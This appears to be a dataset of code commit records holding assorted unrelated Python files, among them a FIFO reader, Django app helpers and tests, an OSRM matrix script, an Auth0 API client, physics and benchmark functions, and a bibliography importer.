# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
import os
import fcntl
import select
import threading
import traceback
class FifoReader(object):
    """Background reader for a named pipe (FIFO).

    Borg pattern: every instance aliases ``__shared_state``, so the reader
    behaves as a process-wide singleton.  ``start`` launches a thread that
    selects on the FIFO and hands each connected writer's stream to the
    callback; ``stop`` wakes the thread through an internal pipe and blocks
    until reading has fully wound down.
    """
    __shared_state = {}

    read_lock = threading.Lock()
    stop_lock = threading.Lock()
    running = False
    quitfds = None

    def __init__(self):
        # Borg: share attribute state across all instances.
        # (A leftover debug ``print "lol"`` was removed here.)
        self.__dict__ = self.__shared_state

    def start(self, callback, fifo_loc):
        """Start reading *fifo_loc*; *callback* receives one file object per writer."""
        self.callback = callback
        self.fifo_loc = fifo_loc
        threading.Thread(target=self.run).start()

    def run(self):
        """Thread body: dispatch each FIFO connection to the callback."""
        self.read_lock.acquire()
        try:
            for fileobj in self.gen_messages():
                try:
                    self.callback(fileobj)
                except Exception:
                    # Keep the reader alive even if a callback blows up.
                    print("Uncaught exception caught inside fiforeader")
                    traceback.print_exc()
                finally:
                    fileobj.close()
        finally:
            self.read_lock.release()

    def gen_messages(self):
        """Yield a file object for each writer until ``stop`` is called."""
        self.running = True
        # Anonymous pipe used solely to interrupt select() on shutdown.
        self.quitfds = os.pipe()
        while self.running:
            fifo = os.open(self.fifo_loc, os.O_RDONLY | os.O_NONBLOCK)
            flags = fcntl.fcntl(fifo, fcntl.F_GETFL)
            # Clear O_NONBLOCK again before blocking in select().  The old
            # code used F_SETFD (fd flags) with F_GETFL status flags, which
            # never actually updated the file status flags.
            fcntl.fcntl(fifo, fcntl.F_SETFL, flags & ~os.O_NONBLOCK)
            readfds, _, _ = select.select([fifo, self.quitfds[0]], [], [])
            # If our anonymous descriptor was written to, exit loop
            if not self.running or self.quitfds[0] in readfds:
                os.close(fifo)
                os.close(self.quitfds[0])
                os.close(self.quitfds[1])
                break
            if fifo not in readfds:
                continue
            yield os.fdopen(fifo)

    def stop(self):
        """Signal the reader thread to exit and wait for it to finish."""
        self.stop_lock.acquire()
        try:
            if self.running:
                self.running = False
                os.write(self.quitfds[1], b'1')
                # Block until we have actually stopped
                self.read_lock.acquire()
                self.read_lock.release()
        finally:
            self.stop_lock.release()
| Python | 0 | |
5c3304ffbd78ee47b2c4d197165de08200e77632 | Fix the `week` behavour to match api2 | standup/apps/status/helpers.py | standup/apps/status/helpers.py | import re
from datetime import date, datetime, timedelta
from standup.database.helpers import paginate as _paginate
def paginate(statuses, page=1, startdate=None, enddate=None, per_page=20):
    # Narrow the status query to the optional date window, then hand off
    # to the shared database paginator.
    from standup.apps.status.models import Status
    if startdate:
        statuses = statuses.filter(Status.created >= startdate)
    if enddate:
        statuses = statuses.filter(Status.created <= enddate)
    return _paginate(statuses, int(page), per_page=per_page)
def startdate(request):
    # Resolve the report window start from query args: ?dates=7d|today,
    # ?day=YYYY-MM-DD (that day), or ?week=YYYY-MM-DD (its Monday).
    dates = request.args.get('dates')
    day = request.args.get('day')
    week = request.args.get('week')
    if dates == '7d':
        return date.today() - timedelta(days=7)
    elif dates == 'today':
        return date.today()
    elif isday(day):
        return get_day(day)
    elif isday(week):
        return week_start(get_day(week))
    return None
def enddate(request):
    # Resolve the window end: day + 1 for ?day, the week's Sunday for ?week.
    day = request.args.get('day')
    week = request.args.get('week')
    if isday(day):
        return get_day(day) + timedelta(days=1)
    elif isday(week):
        return week_end(get_day(week))
    return None
def isday(day):
    """Truthy when *day* is a YYYY-MM-DD string; falsy input passes through."""
    # Raw string: '\d' in a plain literal is an invalid escape sequence
    # (DeprecationWarning on modern Pythons).
    return day and re.match(r'^\d{4}-\d{2}-\d{2}$', day)
def get_day(day):
    """Parse a YYYY-MM-DD string into a naive midnight datetime."""
    return datetime.strptime(day, '%Y-%m-%d')
def get_weeks(num_weeks=10):
    """Describe the most recent *num_weeks* weeks, newest first."""
    anchor = datetime.now()
    weeks = []
    for weeks_ago in range(num_weeks):
        weeks.append({"start_date": week_start(anchor),
                      "end_date": week_end(anchor),
                      "weeks_ago": weeks_ago})
        anchor = anchor - timedelta(7)
    return weeks
def week_start(d):
    """Monday on or before the given date (weeks run Monday-Sunday)."""
    days_past_monday = d.isoweekday() - 1
    return d - timedelta(days=days_past_monday)
def week_end(d):
    """Sunday on or after the given date (weeks end on Sunday)."""
    days_until_sunday = 7 - d.isoweekday()
    return d + timedelta(days=days_until_sunday)
| import re
from datetime import date, datetime, timedelta
from standup.database.helpers import paginate as _paginate
def paginate(statuses, page=1, startdate=None, enddate=None, per_page=20):
from standup.apps.status.models import Status
if startdate:
statuses = statuses.filter(Status.created >= startdate)
if enddate:
statuses = statuses.filter(Status.created <= enddate)
return _paginate(statuses, int(page), per_page=per_page)
def startdate(request):
    # Resolve the report window start from query args: ?dates=7d|today,
    # ?day=YYYY-MM-DD, or ?week=YYYY-MM-DD (here the week branch returns
    # the given day itself rather than its Monday).
    dates = request.args.get('dates')
    day = request.args.get('day')
    week = request.args.get('week')
    if dates == '7d':
        return date.today() - timedelta(days=7)
    elif dates == 'today':
        return date.today()
    elif isday(day):
        return get_day(day)
    elif isday(week):
        return get_day(week)
    return None
def enddate(request):
    # Resolve the window end: day + 1 for ?day, day + 7 for ?week.
    day = request.args.get('day')
    week = request.args.get('week')
    if isday(day):
        return get_day(day) + timedelta(days=1)
    elif isday(week):
        return get_day(week) + timedelta(days=7)
    return None
def isday(day):
    """Truthy when *day* is a YYYY-MM-DD string; falsy input passes through."""
    # Raw string: '\d' in a plain literal is an invalid escape sequence
    # (DeprecationWarning on modern Pythons).
    return day and re.match(r'^\d{4}-\d{2}-\d{2}$', day)
def get_day(day):
return datetime.strptime(day, '%Y-%m-%d')
def get_weeks(num_weeks=10):
weeks = []
current = datetime.now()
for i in range(num_weeks):
weeks.append({"start_date": week_start(current), \
"end_date": week_end(current), \
"weeks_ago": i })
current = current - timedelta(7)
return weeks
def week_start(d):
"""Weeks start on the Monday on or before the given date"""
return d - timedelta(d.isoweekday() - 1)
def week_end(d):
"""Weeks start on the Sunday on or after the given date"""
return d + timedelta(7 - d.isoweekday())
| Python | 0.999933 |
6e096fc10c7eb580ec11fbee585dd2aa3210e2b3 | add settings example | blog/settings_example.py | blog/settings_example.py | SITE_URL = "http://project.com"
SITE_NAME = "Project Name"
COMMENTS_APP = 'threadedcomments' # for example
RECAPTCHA_PUBLIC_KEY = 'put-your-key-here'
RECAPTCHA_PRIVATE_KEY = 'put-your-key-here'
SOUTH_MIGRATION_MODULES = {
'taggit': 'taggit.south_migrations',
}
TAGGIT_TAGCLOUD_MIN = 1
TAGGIT_TAGCLOUD_MAX = 8
GRAPPELLI_ADMIN_TITLE = u'{} Administration'.format(SITE_NAME) | Python | 0 | |
edfba32b5dd24c0fe58da9bbbe84267e81754233 | add demo.py | demo.py | demo.py | import pdb
import json
from pprint import pprint
from chrome_debugger import protocol
from chrome_debugger import interface
from chrome_debugger import websocket
# Attach to a Chrome DevTools websocket endpoint; the trailing GUID is
# per-session, so update it to match your running browser tab.
context = protocol.connect("ws://localhost:9222/devtools/page/D08C4454-9122-6CC8-E492-93A22F9C9727")
header = websocket.parse_response(context["sock"].recv(4096))
interface.debugger_enable(context)
# Dump every debugger event until interrupted.
while True:
    pprint(protocol.recv(context))
| Python | 0.000001 | |
863ae7a76567913f60a758a9fb974a27e9bc58d2 | add 21 | p021.py | p021.py | from utils import divisors
def d(n):
    # Sum of the divisors produced by utils.divisors -- for Project Euler
    # 21 this should be the *proper* divisors of n; confirm against utils.
    return sum(divisors(n))
# Sum of amicable numbers under 10000: d(n) != n and d(d(n)) == n.
print sum(filter(lambda n: n != d(n) and n == d((d(n))), range(1, 10000)))
a3a92435781300966ca59d5316693d0306abd600 | Create osrm_OD_matrix.py | osrm_OD_matrix.py | osrm_OD_matrix.py | # using osrm to create a big dirty OD matrix
import csv
import requests
import polyline
import time
import json
db_points = []
# grab points from csv file - just grab, x, y, and a unique ID
# the headers may be different depending on your data!
with open("db.csv", 'r') as csvfile:
    reader = csv.DictReader(csvfile)
    n = 0
    q = 0
    for row in reader:
        # limiting number of points for testing, may do all eventually!
        # (n % 1 == 0 is always true, so every row is kept; raise the
        # modulus to subsample. q counts the rows kept.)
        if n % 1 == 0:
            q += 1
            db_points.append([row['X'],row['Y'],row['dbuid']])
        n += 1
# split up into managable size - 2000 destinations seems managable
# NOTE(review): the chunk size actually used below is 3000, not 2000.
point_count = len(db_points)
points_split_list = []
single_list = []
i = 1
for row in db_points:
    single_list.append(row)
    if i % 3000 == 0:
        points_split_list.append(single_list)
        single_list = []
    # flush the final partial chunk
    # NOTE(review): when the total is an exact multiple of 3000 this
    # appends an extra *empty* trailing chunk -- confirm intended.
    if i == len(db_points):
        points_split_list.append(single_list)
    i += 1
# print lenghts of before and after
print len(db_points)
print len(points_split_list)
for x in points_split_list:
    print len(x)
# make sure these total!
# list of ids
dbuids = []
for row in db_points:
    dbuids.append(row[2])
print len(dbuids)
# set up that awesome marix were going to output!
the_matrix = []
# lets add in a header row!
# (the leading '' keeps the origin-id column blank in the header)
the_matrix.append([''] + dbuids)
print len(the_matrix)
print len(the_matrix[0])
# the start time for time timing
start_time = time.time()
# loop over the origins
for origin in db_points:
    # the output row!
    out_row = [origin[2]]
    for points in points_split_list:
        # Build the coordinate list for OSRM's table service: the origin
        # is vertex 0 (hence sources=0 below) and the chunk's points are
        # the destinations. Points are (lat, lon) tuples for polyline.
        polyline_list = []
        polyline_list.append((float(origin[1]),float(origin[0])))
        # grab x y for lists
        for row in points:
            dr_tuple = (float(row[1]),float(row[0]))
            polyline_list.append(dr_tuple)
        line = polyline.encode(polyline_list, 5)
        # what to send
        url = 'http://localhost:5000/table/v1/driving/polyline(' + line + ')?sources=0'
        # sending and recieving
        page = requests.get(url)
        data = json.loads(page.content)
        # durations[0] is the row of travel times from the single source
        durs = data["durations"][0]
        del durs[0] # deleting initial 0
        out_row = out_row + durs
    the_matrix.append(out_row)
    # this break is for testing!
    break
print time.time() - start_time
for row in the_matrix:
    print len(row)
| Python | 0.006322 | |
41a533ffddfebc3303a1e882bfaf1fcdd243828e | add api like test | myideas/core/tests/test_like_api.py | myideas/core/tests/test_like_api.py | from django.test import TestCase
from django.test.client import Client
from django.shortcuts import resolve_url as r
from django.contrib.auth.models import User
from myideas.core.models import Ideas
class LikeApiTest(TestCase):
    """Integration tests for the idea 'like' API endpoint."""

    def setUp(self):
        self.client = Client()
        self.username = 'diego'
        self.email = 'test@djangoapp.com'
        self.password = 'test'
        user = User.objects.create_user(self.username, self.email, self.password)
        self.idea = Ideas.objects.create(user=user, title='test app')

    def api_signin_and_get(self):
        """Log the fixture user in, then GET the idea's like endpoint."""
        credentials = {'username': self.username, 'password': self.password}
        self.login = self.client.login(**credentials)
        self.response = self.client.get(r(self.idea.get_api_like_url()))

    def test_get(self):
        """GET 'Ideas like api' must return status code 200"""
        self.api_signin_and_get()
        self.assertEqual(200, self.response.status_code)

    def test_api_status(self):
        """The endpoint must hand back a truthy response object."""
        self.api_signin_and_get()
        self.assertTrue(self.response)

    def test_api_likes_count(self):
        """One authenticated GET must register exactly one like."""
        self.api_signin_and_get()
        self.assertEqual(1, self.idea.likes.count())

    def test_access_forbidden(self):
        """GET page not logged in must return status code 403"""
        self.response = self.client.get(r(self.idea.get_api_like_url()))
        self.assertEqual(403, self.response.status_code)
| Python | 0 | |
10c19d0c7d7cdb2c823a698db8ca128134f32c5a | Add beam potential generation | otz/Beam.py | otz/Beam.py | import pdb
import numpy as np
import scipy as sp
h = 6.626E-34
c = 3.0E8
def uniform(max_angle, intensity):
    """Build a top-hat beam profile: constant *intensity* for angles with
    |phi| strictly below max_angle, zero elsewhere."""
    def profile(phi):
        inside = abs(phi) < max_angle
        return intensity if inside else 0
    return profile
def default_profile(angle):
    """Default beam profile: uniform unit intensity inside a pi/8 cone."""
    profile = uniform(np.pi/8.0, 1)
    return profile(angle)
class Bead:
    """A dielectric bead in an optical trap.

    Holds the bead's diameter, relative refractive index, mass, and its
    (r, z) position relative to the beam focus; z defaults to one diameter.
    """
    def __init__(self, diameter, index=2, mass=1, r=0, z=None):
        self.diameter = diameter
        # 'disable' was a typo for 'diameter' in the original; kept so any
        # existing callers reading it keep working.
        self.disable = diameter
        self.radius = diameter/2.0
        self.mass = mass
        self.r = r
        if z is None:
            z = diameter
        self.z = z
        self.index = index

    def set_position(self, r, z):
        """Move the bead to radial offset r and axial offset z."""
        self.r = r
        self.z = z
class Beam:
    """A focused light beam: a wavelength plus an angular intensity
    profile ``profile(phi)``."""
    def __init__(self, wavelength, profile=default_profile):
        self.profile = profile
        self.wavelength = wavelength
    def force(self, bead):
        """Ray-optics trapping force on *bead*.

        Returns (F_r, F_z); each element is a scipy.integrate.quad result
        tuple (value, abserr), so the radial force value is force(bead)[0][0].

        NOTE(review): this relies on `sp.integrate` being reachable from
        `import scipy as sp` alone; ensure `scipy.integrate` is imported
        somewhere, otherwise these calls raise AttributeError.
        """
        r = bead.r
        z = bead.z
        n = bead.index
        R = bead.radius
        # distance and polar angle of the bead centre from the beam focus
        d = np.sqrt(z**2+r**2)
        phi_prime = np.arctan2(r,z)
        # angle subtended at the bead for a ray entering at angle phi
        def theta(phi):
            return np.arctan2(R*np.sin(phi),d-R*np.cos(phi))
        def theta_prime(phi):
            return theta(phi-phi_prime)
        # refraction angle inside the bead (matches Snell's law with
        # relative index n)
        def theta2(phi):
            return np.arcsin(np.sin(phi+theta_prime(phi))/n)
        def delta_theta(phi):
            return 2*theta2(phi)
        # per-angle weight: profile * h*c/wavelength.
        # NOTE(review): h*c/lambda is the photon *energy*; photon momentum
        # would be h/lambda -- confirm the intended units.
        def p(phi):
            return self.profile(phi)*h*c/self.wavelength
        # deflection resolved into radial and axial components
        def dF_r(phi):
            return -p(phi)*(np.sin(theta_prime(phi))-np.sin(theta_prime(phi)+delta_theta(phi)))
        def dF_z(phi):
            return -p(phi)*(np.cos(theta_prime(phi))-np.cos(theta_prime(phi)+delta_theta(phi)))
        F_r = sp.integrate.quad(dF_r, -np.pi/2.0, np.pi/2.0)
        F_z = sp.integrate.quad(dF_z, -np.pi/2.0, np.pi/2.0)
        return (F_r, F_z)
    def r_potential(self, bead, r_lim=None, z=None, dx = None):
        """Radial potential profile at fixed z.

        Samples the radial force on a grid r in [-r_lim, r_lim) and returns
        (r[:-1], V), V being the cumulative trapezoid integral of the
        sampled force. Mutates bead.r (and bead.z when *z* is given).

        NOTE(review): a potential is conventionally the *negative* integral
        of the force -- confirm the intended sign.
        """
        if r_lim is None:
            r_lim = 2*bead.radius
        if z is not None:
            bead.z = z
        if dx is None:
            dx = r_lim/1e4
        r = np.arange(-r_lim, r_lim, dx)
        def restoring_force(dist):
            bead.r = dist
            return self.force(bead)[0][0]
        force_r = [restoring_force(dist) for dist in r]
        V = sp.integrate.cumtrapz(force_r, r)
        return (r[:-1],V)
| Python | 0 | |
ad5018c045a14f2e8360e8118d73d021df10baab | add solution for Course Schedule II | algorithms/courseScheduleII/courseScheduleII.py | algorithms/courseScheduleII/courseScheduleII.py | class Solution:
# @param {integer} numCourses
# @param {integer[][]} prerequisites
# @return {integer[]}
def findOrder(self, numCourses, prerequisites):
g = {v: [] for v in xrange(numCourses)}
deg = {v: 0 for v in xrange(numCourses)}
s = set(range(numCourses))
for u, v in prerequisites:
g[v].append(u)
deg[u] += 1
s.discard(u)
res = []
while s:
u = s.pop()
res.append(u)
for v in g[u]:
deg[v] -= 1
if deg[v] == 0:
s.add(v)
return [] if len(res) != numCourses else res
| Python | 0 | |
4557cce84ff91e830f1f1fd241223cff70ceb46e | add directions and a script for how I found duplicate functions | deprecated/utils/tags-to-dup-functions.py | deprecated/utils/tags-to-dup-functions.py | # Run the below command to generate the TAGS file, then run this script with TAGS as stdin to see duplicate function names
#
# find . -name \*.c -not -path ./deprecated/\* -print0 | xargs -0 etags --declarations -D --no-globals -I --no-members
import collections
import sys
src_file = None
got_section_header = 0
# function name => list of files
functions = collections.defaultdict(lambda: set())
for line in sys.stdin:
line = line.rstrip('\r\n')
if got_section_header == 0:
if line != "\x0c":
exit("invalid header first line: %s" % line)
got_section_header = 1
elif got_section_header == 1:
src_file, sep, tail = line.rpartition(',')
if sep != ',':
exit("invalid header second line: %s" % line)
got_section_header = 2
elif got_section_header == 2:
if line == "\x0c":
got_section_header = 1
else:
definition, sep, tail = line.rpartition('\x7f')
if sep != '\x7f':
exit("invalid definition line: %s" % line)
if definition[-1] == '(':
head, sep, function = definition.rpartition(' ')
if sep != ' ':
function = sep
function = function.rstrip('(')
function = function.lstrip('*')
functions[function].add(src_file)
else:
exit("unexpected value for got_section_header, %s" % got_section_header);
for k, v in functions.iteritems():
if len(v) > 1:
print k, len(v), ' '.join(v)
| Python | 0 | |
4331b380e43751a7223e0ee1dee6c1c45ad09a67 | add levy function | robo/task/levy.py | robo/task/levy.py | '''
Created on 12.07.2015
@author: Aaron Klein
'''
import numpy as np
from robo.task.base_task import BaseTask
class Levy(BaseTask):
    """One-dimensional Levy benchmark on [-15, 10]; minimum f(1) = 0."""

    def __init__(self):
        bounds_low = np.array([-15])
        bounds_high = np.array([10])
        minimizer = np.array([[1.0]])
        minimum_value = 0.0
        super(Levy, self).__init__(bounds_low, bounds_high,
                                   opt=minimizer, fopt=minimum_value)

    def objective_function(self, x):
        """Evaluate the Levy function; returns a column vector."""
        z = 1 + ((x - 1.) / 4.)
        s = np.power((np.sin(np.pi * z)), 2)
        y = (s + ((z - 1) ** 2) * (1 + np.power((np.sin(2 * np.pi * z)), 2)))
        return y[:, np.newaxis]

    def objective_function_test(self, x):
        """Test-set evaluation; identical to objective_function."""
        return self.objective_function(x)
| Python | 0.000004 | |
f2c6e7cf6e60eac5222658d89baf28e1e7d12939 | Test minimal snoop2 | platforms/m3/programming/mbus_snoop_img2.py | platforms/m3/programming/mbus_snoop_img2.py | #!/usr/bin/python
import os
import sys
import logging
import csv
import time
import datetime
from datetime import datetime
import m3_common
#m3_common.configure_root_logger()
#logger = logging.getLogger(__name__)
from m3_logging import get_logger
logger = get_logger(__name__)
def Bpp_callback(address, data, cb0, cb1):
    # Print one snooped MBus message with a millisecond-resolution timestamp.
    # address/data are byte strings (.encode('hex') is Python 2 only);
    # cb1 presumably carries the inverted ACK bit (printed as "not cb1"),
    # while cb0 is unused here -- confirm against m3_common.mbus_snooper.
    print(" Time: " + datetime.now().strftime("%Y-%m-%d %H:%M:%S.%f")[:-3] + " ADDR: 0x" + address.encode('hex') + " DATA: 0x" + data.encode('hex') + " (ACK: " + str(not cb1) + ")")
# Attach the callback to an MBus snooper and block in hang_for_messages(),
# dumping every observed bus message.
m = m3_common.mbus_snooper(Bpp_callback)
m.hang_for_messages()
| Python | 0.000001 | |
a8c7c6f08571449b618fd57f298546da6ef80ee9 | Add a pyastro16.py file to use as an auto doc demo | astrospam/pyastro16.py | astrospam/pyastro16.py | """
Python in Astronomy 2016 is the second iteration of the Python in Astronomy
conference series.
This is the docstring for the pyastro module, this gets included as the
description for the module.
"""
import numpy as np
def times(a, b):
    """
    Multiply a by b.

    Parameters
    ----------
    a : `numpy.ndarray`
        Array one.
    b : `numpy.ndarray`
        Array two.

    Returns
    -------
    result : `numpy.ndarray`
        ``a`` multiplied by ``b``
    """
    # Fixed: the original called the nonexistent np.multipy, which raised
    # AttributeError on every call.
    return np.multiply(a, b)
class PyAstro(object):
    """
    This is a class docstring; it documents the parameters accepted when
    constructing the class, i.e. the signature of ``__init__``.

    Parameters
    ----------
    awesomeness_level : `int`
        How awesome is pyastro16??!
    day : `int`
        Day of the conference. Defaults to 1.

    Attributes
    ----------
    awesomeness_level: `int`
        Plain (non-property) attributes can be documented here.
    """

    def __init__(self, awesomeness_level, day=1):
        # Hidden methods get no rendered docstring, so a comment suffices.
        self.awesomeness_level = awesomeness_level
        self._day = day

    @property
    def day(self):
        """
        Day of the conference.

        Properties are automatically documented as attributes.
        """
        return self._day
| Python | 0 | |
9af2a8341b59098d0ebb88f1e71a3452c338b191 | Add a plotting example. | Lib/sandbox/pyem/examples/plotexamples.py | Lib/sandbox/pyem/examples/plotexamples.py | #! /usr/bin/env python
# Last Change: Mon Jun 11 03:00 PM 2007 J
# This is a simple test to check whether plotting ellipsoides of confidence and
# isodensity contours match
import numpy as N
from numpy.testing import set_package_path, restore_path
import pylab as P
# Temporarily adjust sys.path so the in-tree pyem package is importable.
set_package_path()
import pyem
restore_path()
# Generate a simple mixture model, plot its confidence ellipses + isodensity
# curves for both diagonal and full covariance matrices
# (d and k are passed to pyem.GM.gen_param -- presumably data dimension
# and number of mixture components; dim selects the two axes to plot)
d = 3
k = 3
dim = [0, 2]
# diag model
w, mu, va = pyem.GM.gen_param(d, k)
dgm = pyem.GM.fromvalues(w, mu, va)
# full model
w, mu, va = pyem.GM.gen_param(d, k, 'full', spread = 1)
fgm = pyem.GM.fromvalues(w, mu, va)
def plot_model(gm, dim):
    """Overlay a mixture model's confidence ellipses (dash-dot), its
    isodensity contours, and a 200-point sample, projected onto the two
    axes listed in *dim*."""
    X, Y, Z, V = gm.density_on_grid(dim = dim)
    h = gm.plot(dim = dim)
    # Plain loop: the original used a list comprehension purely for its
    # side effect, allocating a throwaway list.
    for handle in h:
        handle.set_linestyle('-.')
    P.contour(X, Y, Z, V)
    data = gm.sample(200)
    P.plot(data[:, dim[0]], data[:,dim[1]], '.')
# Plot the contours and the ellipsoids of confidence
# (top subplot: diagonal-covariance model; bottom: full-covariance model)
P.subplot(2, 1, 1)
plot_model(dgm, dim)
P.subplot(2, 1, 2)
plot_model(fgm, dim)
P.show()
| Python | 0.000001 | |
71ac93da2eed58bbd53bb13d4ade308404be18ad | Add auth0.v2.connection | auth0/v2/connection.py | auth0/v2/connection.py | from .rest import RestClient
class Connection(object):
    """Auth0 connection endpoints"""

    def __init__(self, domain, jwt_token):
        url = 'https://%s/api/v2/connections' % domain
        self.client = RestClient(endpoint=url, jwt=jwt_token)

    def all(self, strategy=None, fields=None, include_fields=True):
        """Retrieves all connections.

        Args:
            strategy (str, optional): Only retrieve connections of
                this strategy type. (e.g: strategy='amazon')

            fields (list of str, optional): A list of fields to include or
                exclude from the result (depending on include_fields). Empty to
                retrieve all fields.

            include_fields (bool, optional): True if the fields specified are
                to be include in the result, False otherwise.

        Returns:
            A list of connection objects.
        """
        # fields defaults to None instead of [] to avoid the shared
        # mutable-default pitfall; an absent/empty list still maps to None.
        params = {'strategy': strategy or None,
                  'fields': ','.join(fields or []) or None,
                  'include_fields': str(include_fields).lower()}

        return self.client.get(params=params)

    def get(self, id, fields=None, include_fields=True):
        """Retrieve connection by id.

        Args:
            id (str): Id of the connection to get.

            fields (list of str, optional): A list of fields to include or
                exclude from the result (depending on include_fields). Empty to
                retrieve all fields.

            include_fields (bool, optional): True if the fields specified are
                to be include in the result, False otherwise.

        Returns:
            A connection object.
        """
        params = {'fields': ','.join(fields or []) or None,
                  'include_fields': str(include_fields).lower()}

        return self.client.get(params=params, id=id)

    def delete(self, id):
        """Deletes a connection and all its users.

        Args:
            id: Id of the connection to delete.

        Returns:
            An empty dict.
        """
        return self.client.delete(id=id)

    def update(self, id, body):
        """Modifies a connection.

        Args:
            id: Id of the connection.

            body (dict): Specifies which fields are to be modified, and to
                what values.

        Returns:
            The modified connection object.
        """
        return self.client.patch(id=id, data=body)

    def create(self, body):
        """Creates a new connection."""
        return self.client.post(data=body)
| Python | 0 | |
ea0d9781f3bfb74d6678ca5e353a250a18c5f03e | Use Tilde organizer (with Berlinium GUI) as a bibliography manager | utils/add_pdf_articles.py | utils/add_pdf_articles.py | """
This script introduces how the Tilde organizer
can be used as a bibliography manager.
See https://github.com/tilde-lab/pycrystal/tree/master/papers
for an example usage for the CRYSTAL17 code online bibliography.
Two files are currently needed:
* bib_els_file (raw bibliography items as presented online)
* bib_data_file (processed bibliography items, e.g. with DOI, PDF, etc.)
"""
import os
import sys
import json
import random
from hashlib import md5
import chk_tilde_install
from tilde.core.api import API
from tilde.core.settings import connect_database, settings
from tilde.parsers import Output
# these mappings were absent in the CRYSTAL17 online bibliography
MISSING_MAPPING = {'to127': ['O', 'Zr'], 'knaup2005': ['C', 'O', 'Si'], 'catti2000': ['O', 'Si'], 'to307': ['H', 'O', 'Si'], 'sto52': ['H', 'O', 'Si'], 'lindsay98': ['Cl', 'Si'], 'mukhopadhyay2004': ['O', 'Si'], 'to279': ['O', 'Si'], 'Gibbs99a': ['O', 'Si'], 'gibbs1999': ['O', 'Si'], 'gibbs2003': ['O', 'Si'], 'gibbs2006': ['Na', 'Mg', 'Al', 'Si', 'B', 'N', 'C', 'S', 'P', 'O'], 'sto89': ['O', 'Si'], 'to220': ['C', 'Si'], 'zwijnenburg2007': ['O', 'Si'], 'to264': ['O', 'Si'], 'goumans2007': ['O', 'Si'], 'to45': ['C', 'Si'], 'sonnet1999': ['Si'], 'to253': ['O', 'Si'], 'gnani2000': ['O', 'Si'], 'zwijnenburg2006': ['Si', 'Ge', 'Be', 'O', 'F', 'S'], 'to44': ['Si'], 'to126': ['Si'], 'knaup2005b': ['C', 'Si'], 'gibbs2000': ['O', 'Si'], 'sto72': ['Si'], 'sto92': ['H', 'Si']}
class PDF_Article(Output):
    """Tilde data item representing a bibliography entry backed by a PDF."""
    def __init__(self, filename):
        Output.__init__(self, filename)
        self.related_files.append(filename)
        # dtype flag marking this item as bibliographic data -- confirm
        # against tilde.parsers' dtype constants.
        self.info['dtype'] = 0x1
    def get_checksum(self):
        # Entry identity: MD5 of the PDF contents plus a 'PDF' suffix
        # (the suffix keeps these distinct from other checksum kinds).
        if os.path.exists(self._filename):
            hash_md5 = md5()
            with open(self._filename, "rb") as f:
                for chunk in iter(lambda: f.read(4096), b""):
                    hash_md5.update(chunk)
            # NB. there are dups, and we need to workaround them
            return hash_md5.hexdigest() + 'PDF'
        # No PDF on disk: drop the related file and hand back a random,
        # non-reproducible identity.
        self.related_files = []
        # for non-ready items, TODO
        return "".join([random.choice("abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789") for _ in range(48)]) + 'PDF'
    def set_meta_and_els(self, els):
        # Fill the searchable metadata fields from the list of chemical
        # elements this paper covers.
        self.info['elements'] = els
        self.info['standard'] = ' / '.join(sorted(els))
        self.info['formula'] = ' / '.join(sorted(els))
        self.info['ng'] = 0
        self.info['nelem'] = 0
        self.info['H'] = 'unknown'
        self.info['framework'] = 0x3 # CRYSTAL
        self.info['ansatz'] = 0x3 # CRYSTAL
if __name__ == "__main__":
    # Usage: add_pdf_articles.py <bib_els_file> <bib_data_file>
    try:
        bib_els_file = sys.argv[1]
        bib_data_file = sys.argv[2]
    except IndexError:
        raise RuntimeError
    # Raw online bibliography: element <-> paper-id maps plus bib entries.
    f = open(bib_els_file)
    els2bib = json.loads(f.read())
    f.close()
    # Processed bibliography: paper-id -> (pdf path, doi, authors, ...).
    f = open(bib_data_file)
    data2meta = json.loads(f.read())
    f.close()
    # folder = grandparent directory of bib_els_file; the relative PDF
    # paths below (e.g. 'data/...') are joined onto it.
    folder = os.sep.join(bib_els_file.split(os.sep)[:-2])
    session = connect_database(settings)
    work = API()
    # Invert els2paperids into paper-id -> [elements].
    data2els = {}
    for el in els2bib['els2paperids']:
        for article_item in set(els2bib['els2paperids'][el]): # FIXME? set, as we have dups els
            data2els.setdefault(article_item, []).append(el)
    data2els.update(MISSING_MAPPING)
    for key in els2bib['paperids2bib']:
        # for non-ready items, TODO
        if key not in data2meta:
            filename = 'data/NONCE'
            doi = None
            authors = els2bib['paperids2bib'][key][0].replace(' and ', ', ').encode('ascii', 'ignore').split(', ')
            year = els2bib['paperids2bib'][key][2]
            article_title = els2bib['paperids2bib'][key][1].encode('ascii', 'ignore')
            pubdata = els2bib['paperids2bib'][key][3].encode('ascii', 'ignore')
            print("Missing: %s, %s, %s (%s)" % (authors, article_title, pubdata, year))
        else:
            filename = data2meta[key][0]
            doi = data2meta[key][1]
            authors = data2meta[key][2].encode('ascii', 'ignore').split(', ')
            year = data2meta[key][5]
            article_title = data2meta[key][3].encode('ascii', 'ignore')
            pubdata = data2meta[key][4].encode('ascii', 'ignore')
        # De-duplicate authors while preserving their order.
        seen = set()
        seen_add = seen.add
        authors = [x for x in authors if not (x in seen or seen_add(x))] # preserving order
        data_item = PDF_Article(os.path.join(folder, filename))
        data_item.set_meta_and_els(data2els[key])
        data_item.info['authors'] = authors
        data_item.info['year'] = year
        data_item.info['article_title'] = article_title
        if doi: data_item.info['doi'] = doi
        data_item.info['pubdata'] = pubdata
        checksum, error = work.save(data_item, session)
        if error:
            print(error)
    session.close()
| Python | 0 | |
7e600a791bec2f8639aae417a1ea052ca94cf7b9 | Add a largish auto-generated test for the aligned bundling feature, along with the script generating it. The test should never be modified manually. If anyone needs to change it, please change the script and re-run it. | testgen/mc-bundling-x86-gen.py | testgen/mc-bundling-x86-gen.py | #!/usr/bin/python
# Auto-generates an exhaustive and repetitive test for correct bundle-locked
# alignment on x86.
# For every possible offset in an aligned bundle, a bundle-locked group of every
# size in the inclusive range [1, bundle_size] is inserted. An appropriate CHECK
# is added to verify that NOP padding occurred (or did not occur) as expected.
# This script runs with Python 2.6+ (including 3.x)
from __future__ import print_function
BUNDLE_SIZE_POW2 = 4
